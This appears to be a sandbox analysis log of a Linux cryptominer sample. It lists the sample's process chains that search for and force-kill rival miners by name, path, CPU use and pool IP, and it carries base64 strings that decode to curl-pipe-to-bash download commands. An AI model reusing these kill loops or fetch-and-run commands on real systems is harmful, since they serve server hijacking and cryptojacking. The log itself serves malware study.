ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:1015

/bin/grep
grep nMrfmnRa
2⤵
PID:1024

/bin/grep
grep -v grep
2⤵
PID:1023

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1026

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1025

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Process Discovery
PID:1022

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1033

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1032

/bin/grep
grep PuNY5tm2
2⤵
PID:1031

/bin/grep
grep -v grep
2⤵
PID:1030

/bin/ps
ps aux
2⤵
PID:1029

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1039

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1038

/bin/grep
grep I0r8Jyyt
2⤵
PID:1037

/bin/grep
grep -v grep
2⤵
PID:1036

/bin/ps
ps aux
2⤵
PID:1035

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1045

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1044

/bin/grep
grep AgdgACUD
2⤵
PID:1043

/bin/grep
grep -v grep
2⤵
PID:1042

/bin/ps
ps aux
2⤵
PID:1041

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1052

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1051

/bin/grep
grep uiZvwxG8
2⤵
PID:1050

/bin/grep
grep -v grep
2⤵
PID:1049

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1048

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1059

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1058

/bin/grep
grep hahwNEdB
2⤵
PID:1057

/bin/grep
grep -v grep
2⤵
PID:1056

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:1055

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1066

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1065

/bin/grep
grep BtwXn5qH
2⤵
PID:1064

/bin/grep
grep -v grep
2⤵
PID:1063

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1062

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1072

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1071

/bin/grep
grep 3XEzey2T
2⤵
PID:1070

/bin/grep
grep -v grep
2⤵
PID:1069

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1068

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1081

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1080

/bin/grep
grep t2tKrCSZ
2⤵
PID:1079

/bin/grep
grep -v grep
2⤵
PID:1078

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1077

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1090

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1089

/bin/grep
grep HD7fcBgg
2⤵
PID:1088

/bin/grep
grep -v grep
2⤵
PID:1087

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:1086

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1095

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1094

/bin/grep
grep zXcDajSs
2⤵
PID:1093

/bin/grep
grep -v grep
2⤵
PID:1092

/bin/ps
ps aux
2⤵
PID:1091

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1103

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1102

/bin/grep
grep 3lmigMo
2⤵
PID:1101

/bin/grep
grep -v grep
2⤵
PID:1100

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1099

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1111

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1110

/bin/grep
grep AkMK4A2
2⤵
PID:1109

/bin/grep
grep -v grep
2⤵
PID:1108

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:1107

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1118

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1117

/bin/grep
grep AJ2AkKe
2⤵
PID:1116

/bin/grep
grep -v grep
2⤵
PID:1115

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1114

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1125

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1124

/bin/grep
grep HiPxCJRS
2⤵
- System Network Configuration Discovery
PID:1123

/bin/grep
grep -v grep
2⤵
PID:1122

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Process Discovery
PID:1121

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1131

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1130

/bin/grep
grep http_0xCC030
2⤵
PID:1129

/bin/grep
grep -v grep
2⤵
PID:1128

/bin/ps
ps aux
2⤵
PID:1127

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1137

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1136

/bin/grep
grep http_0xCC031
2⤵
PID:1135

/bin/grep
grep -v grep
2⤵
PID:1134

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1133

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1142

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1141

/bin/grep
grep http_0xCC032
2⤵
PID:1140

/bin/grep
grep -v grep
2⤵
PID:1139

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:1138

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1148

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1147

/bin/grep
grep http_0xCC033
2⤵
PID:1146

/bin/grep
grep -v grep
2⤵
PID:1145

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1144

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1153

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1152

/bin/grep
grep C4iLM4L
2⤵
PID:1151

/bin/grep
grep -v grep
2⤵
PID:1150

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1149

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1158

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1157

/bin/grep
grep aziplcr72qjhzvin
2⤵
- System Network Configuration Discovery
PID:1156

/bin/grep
grep -v grep
2⤵
PID:1155

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Process Discovery
PID:1154

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1162

/bin/grep
grep -v grep
2⤵
PID:1160

/usr/bin/awk
awk "{ if(substr(\$11,1,2)==\"./\" && substr(\$12,1,2)==\"./\") print \$2 }"
2⤵
PID:1161

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1159

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1167

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1166

/bin/grep
grep /boot/vmlinuz
2⤵
PID:1165

/bin/grep
grep -v grep
2⤵
PID:1164

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:1163

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1172

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1171

/bin/grep
grep i4b503a52cc5
2⤵
PID:1170

/bin/grep
grep -v grep
2⤵
PID:1169

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1168

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1177

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1176

/bin/grep
grep dgqtrcst23rtdi3ldqk322j2
2⤵
PID:1175

/bin/grep
grep -v grep
2⤵
PID:1174

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:1173

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1182

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1181

/bin/grep
grep 2g0uv7npuhrlatd
2⤵
PID:1180

/bin/grep
grep -v grep
2⤵
PID:1179

/bin/ps
ps aux
2⤵
PID:1178

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1187

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1186

/bin/grep
grep nqscheduler
2⤵
PID:1185

/bin/grep
grep -v grep
2⤵
PID:1184

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:1183

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1192

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1191

/bin/grep
grep rkebbwgqpl4npmm
2⤵
PID:1190

/bin/grep
grep -v grep
2⤵
PID:1189

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1188

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1198

/usr/bin/awk
awk "\$3>10.0{print \$2}"
2⤵
PID:1197

/bin/grep
grep "]"
2⤵
PID:1196

/bin/grep
grep -v aux
2⤵
PID:1195

/bin/grep
grep -v grep
2⤵
PID:1194

/bin/ps
ps aux
2⤵
PID:1193

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1203

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1202

/bin/grep
grep 2fhtu70teuhtoh78jc5s
2⤵
PID:1201

/bin/grep
grep -v grep
2⤵
PID:1200

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1199

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1208

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1207

/bin/grep
grep 0kwti6ut420t
2⤵
PID:1206

/bin/grep
grep -v grep
2⤵
PID:1205

/bin/ps
ps aux
2⤵
PID:1204

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1213

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1212

/bin/grep
grep 44ct7udt0patws3agkdfqnjm
2⤵
PID:1211

/bin/grep
grep -v grep
2⤵
PID:1210

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1209

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1220

/usr/bin/awk
awk "length(\$11)>19{print \$2}"
2⤵
PID:1219

/bin/grep
grep -v _
2⤵
PID:1218

/bin/grep
grep -v -
2⤵
PID:1217

/bin/grep
grep -v /
2⤵
PID:1216

/bin/grep
grep -v grep
2⤵
PID:1215

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:1214

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1225

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1224

/bin/grep
grep "\\[^"
2⤵
PID:1223

/bin/grep
grep -v grep
2⤵
PID:1222

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:1221

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1230

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1229

/bin/grep
grep rsync
2⤵
PID:1228

/bin/grep
grep -v grep
2⤵
PID:1227

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:1226

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1235

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1234

/bin/grep
grep watchd0g
2⤵
PID:1233

/bin/grep
grep -v grep
2⤵
PID:1232

/bin/ps
ps aux
2⤵
PID:1231

/bin/grep
grep -v grep
2⤵
PID:1237

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Process Discovery
PID:1236

/bin/egrep
egrep "wnTKYg|2t3ik|qW3xT.2|ddg"
2⤵
PID:1238

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1239

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1240

/usr/local/sbin/grep
grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
2⤵
PID:1238

/usr/local/bin/grep
grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
2⤵
PID:1238

/usr/sbin/grep
grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
2⤵
PID:1238

/usr/bin/grep
grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
2⤵
PID:1238

/sbin/grep
grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
2⤵
PID:1238

/bin/grep
grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
2⤵
PID:1238

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1245

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1244

/bin/grep
grep 158.69.133.18:8220
2⤵
PID:1243

/bin/grep
grep -v grep
2⤵
PID:1242

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1241

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1250

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1249

/bin/grep
grep /tmp/java
2⤵
PID:1248

/bin/grep
grep -v grep
2⤵
PID:1247

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1246

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1255

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1254

/bin/grep
grep gitee.com
2⤵
PID:1253

/bin/grep
grep -v grep
2⤵
PID:1252

/bin/ps
ps aux
2⤵
PID:1251

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1260

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1259

/bin/grep
grep /tmp/java
2⤵
PID:1258

/bin/grep
grep -v grep
2⤵
PID:1257

/bin/ps
ps aux
2⤵
PID:1256

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1265

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1264

/bin/grep
grep 104.248.4.162
2⤵
PID:1263

/bin/grep
grep -v grep
2⤵
PID:1262

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1261

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1270

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1269

/bin/grep
grep 89.35.39.78
2⤵
PID:1268

/bin/grep
grep -v grep
2⤵
PID:1267

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:1266

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1275

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1274

/bin/grep
grep /dev/shm/z3.sh
2⤵
PID:1273

/bin/grep
grep -v grep
2⤵
PID:1272

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:1271

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1280

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1279

/bin/grep
grep kthrotlds
2⤵
PID:1278

/bin/grep
grep -v grep
2⤵
PID:1277

/bin/ps
ps aux
2⤵
PID:1276

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1286

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1285

/bin/grep
grep ksoftirqds
2⤵
PID:1284

/bin/grep
grep -v grep
2⤵
PID:1283

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:1282

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1292

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1291

/bin/grep
grep netdns
2⤵
PID:1290

/bin/grep
grep -v grep
2⤵
PID:1289

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:1288

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1299

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1298

/bin/grep
grep watchdogs
2⤵
PID:1297

/bin/grep
grep -v grep
2⤵
PID:1296

/bin/ps
ps aux
2⤵
PID:1295

/bin/grep
grep -v atd
2⤵
PID:1309

/bin/grep
grep -v dblaunchs
2⤵
PID:1306

/bin/grep
grep -v dblaunch
2⤵
PID:1305

/usr/bin/awk
awk "\$3>80.0{print \$2}"
2⤵
PID:1311

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1312

/bin/grep
grep -v root
2⤵
PID:1304

/bin/grep
grep -v salt-minions
2⤵
PID:1310

/bin/grep
grep -v grep
2⤵
PID:1303

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1302

/bin/grep
grep -v dblaunched
2⤵
PID:1307

/bin/grep
grep -v apache2
2⤵
PID:1308

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:1313

/bin/grep
grep -v grep
2⤵
PID:1314

/bin/grep
grep -v aux
2⤵
PID:1315

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1317

/bin/grep
grep " ps"
2⤵
PID:1316

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1318

/bin/grep
grep sync_supers
2⤵
PID:1322

/bin/grep
grep -v grep
2⤵
PID:1321

/bin/ps
ps aux
2⤵
PID:1320

/usr/bin/cut
cut -c 9-15
2⤵
PID:1323

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1324

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1330

/usr/bin/cut
cut -c 9-15
2⤵
PID:1329

/bin/grep
grep cpuset
2⤵
PID:1328

/bin/grep
grep -v grep
2⤵
PID:1327

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1326

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1338

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1337

/bin/grep
grep "x]"
2⤵
PID:1336

/bin/grep
grep -v aux
2⤵
PID:1335

/bin/grep
grep -v grep
2⤵
PID:1334

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1333

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1346

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1345

/bin/grep
grep "sh] <"
2⤵
PID:1344

/bin/grep
grep -v aux
2⤵
PID:1343

/bin/grep
grep -v grep
2⤵
PID:1342

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1341

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1353

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1352

/bin/grep
grep " \\[]"
2⤵
PID:1351

/bin/grep
grep -v aux
2⤵
PID:1350

/bin/grep
grep -v grep
2⤵
PID:1349

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1348

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1359

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1358

/bin/grep
grep /tmp/l.sh
2⤵
PID:1357

/bin/grep
grep -v grep
2⤵
PID:1356

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:1355

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1366

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1365

/bin/grep
grep /tmp/zmcat
2⤵
PID:1364

/bin/grep
grep -v grep
2⤵
PID:1363

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1362

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1373

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1372

/bin/grep
grep hahwNEdB
2⤵
PID:1371

/bin/grep
grep -v grep
2⤵
PID:1370

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:1369

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1379

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1378

/bin/grep
grep CnzFVPLF
2⤵
PID:1377

/bin/grep
grep -v grep
2⤵
PID:1376

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:1375

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1385

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1384

/bin/grep
grep CvKzzZLs
2⤵
PID:1383

/bin/grep
grep -v grep
2⤵
PID:1382

/bin/ps
ps aux
2⤵
PID:1381

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1392

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1391

/bin/grep
grep aziplcr72qjhzvin
2⤵
- System Network Configuration Discovery
PID:1390

/bin/grep
grep -v grep
2⤵
PID:1389

/bin/ps
ps aux
2⤵
PID:1388

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1399

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1398

/bin/grep
grep /tmp/udevd
2⤵
PID:1397

/bin/grep
grep -v grep
2⤵
PID:1396

/bin/ps
ps aux
2⤵
PID:1395

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1405

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1404

/bin/grep
grep KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA
2⤵
PID:1403

/bin/grep
grep -v grep
2⤵
PID:1402

/bin/ps
ps aux
2⤵
PID:1401

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1411

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1410

/bin/grep
grep Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo
2⤵
PID:1409

/bin/grep
grep -v grep
2⤵
PID:1408

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1407

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1418

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1417

/bin/grep
grep sustse
2⤵
PID:1416

/bin/grep
grep -v grep
2⤵
PID:1415

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:1414

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1424

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1423

/bin/grep
grep sustse3
2⤵
PID:1422

/bin/grep
grep -v grep
2⤵
PID:1421

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:1420

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1431

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1430

/bin/grep
grep wget
2⤵
PID:1429

/bin/grep
grep mr.sh
2⤵
PID:1428

/bin/grep
grep -v grep
2⤵
PID:1427

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1426

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1437

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1436

/bin/grep
grep curl
2⤵
PID:1435

/bin/grep
grep mr.sh
2⤵
PID:1434

/bin/grep
grep -v grep
2⤵
PID:1433

/bin/ps
ps aux
2⤵
PID:1432

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1443

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1442

/bin/grep
grep wget
2⤵
PID:1441

/bin/grep
grep 2mr.sh
2⤵
PID:1440

/bin/grep
grep -v grep
2⤵
PID:1439

/bin/ps
ps aux
2⤵
PID:1438

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1449

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1448

/bin/grep
grep curl
2⤵
PID:1447

/bin/grep
grep 2mr.sh
2⤵
PID:1446

/bin/grep
grep -v grep
2⤵
PID:1445

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:1444

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1455

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1454

/bin/grep
grep wget
2⤵
PID:1453

/bin/grep
grep cr5.sh
2⤵
PID:1452

/bin/grep
grep -v grep
2⤵
PID:1451

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1450

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1461

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1460

/bin/grep
grep curl
2⤵
PID:1459

/bin/grep
grep cr5.sh
2⤵
PID:1458

/bin/grep
grep -v grep
2⤵
PID:1457

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1456

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1467

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1466

/bin/grep
grep wget
2⤵
PID:1465

/bin/grep
grep logo9.jpg
2⤵
PID:1464

/bin/grep
grep -v grep
2⤵
PID:1463

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:1462

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1473

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1472

/bin/grep
grep curl
2⤵
PID:1471

/bin/grep
grep logo9.jpg
2⤵
PID:1470

/bin/grep
grep -v grep
2⤵
PID:1469

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:1468

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1478

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1477

/bin/grep
grep j2.conf
2⤵
PID:1476

/bin/grep
grep -v grep
2⤵
PID:1475

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1474

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1484

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1483

/bin/grep
grep wget
2⤵
PID:1482

/bin/grep
grep luk-cpu
2⤵
PID:1481

/bin/grep
grep -v grep
2⤵
PID:1480

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1479

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1490

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1489

/bin/grep
grep curl
2⤵
PID:1488

/bin/grep
grep luk-cpu
2⤵
PID:1487

/bin/grep
grep -v grep
2⤵
PID:1486

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1485

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1496

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1495

/bin/grep
grep wget
2⤵
PID:1494

/bin/grep
grep ficov
2⤵
PID:1493

/bin/grep
grep -v grep
2⤵
PID:1492

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:1491

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1502

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1501

/bin/grep
grep curl
2⤵
PID:1500

/bin/grep
grep ficov
2⤵
PID:1499

/bin/grep
grep -v grep
2⤵
PID:1498

/bin/ps
ps aux
2⤵
PID:1497

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1508

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1507

/bin/grep
grep wget
2⤵
PID:1506

/bin/grep
grep he.sh
2⤵
PID:1505

/bin/grep
grep -v grep
2⤵
PID:1504

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1503

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1514

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1513

/bin/grep
grep curl
2⤵
PID:1512

/bin/grep
grep he.sh
2⤵
PID:1511

/bin/grep
grep -v grep
2⤵
PID:1510

/bin/ps
ps aux
2⤵
PID:1509

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1520

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1519

/bin/grep
grep wget
2⤵
PID:1518

/bin/grep
grep miner.sh
2⤵
PID:1517

/bin/grep
grep -v grep
2⤵
PID:1516

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1515

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1526

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1525

/bin/grep
grep curl
2⤵
PID:1524

/bin/grep
grep miner.sh
2⤵
PID:1523

/bin/grep
grep -v grep
2⤵
PID:1522

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Process Discovery
PID:1521

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1532

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1531

/bin/grep
grep wget
2⤵
PID:1530

/bin/grep
grep nullcrew
2⤵
PID:1529

/bin/grep
grep -v grep
2⤵
PID:1528

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:1527

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1538

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1537

/bin/grep
grep curl
2⤵
PID:1536

/bin/grep
grep nullcrew
2⤵
PID:1535

/bin/grep
grep -v grep
2⤵
PID:1534

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:1533

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1543

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1542

/bin/grep
grep 107.174.47.156
2⤵
PID:1541

/bin/grep
grep -v grep
2⤵
PID:1540

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Process Discovery
PID:1539

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1548

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1547

/bin/grep
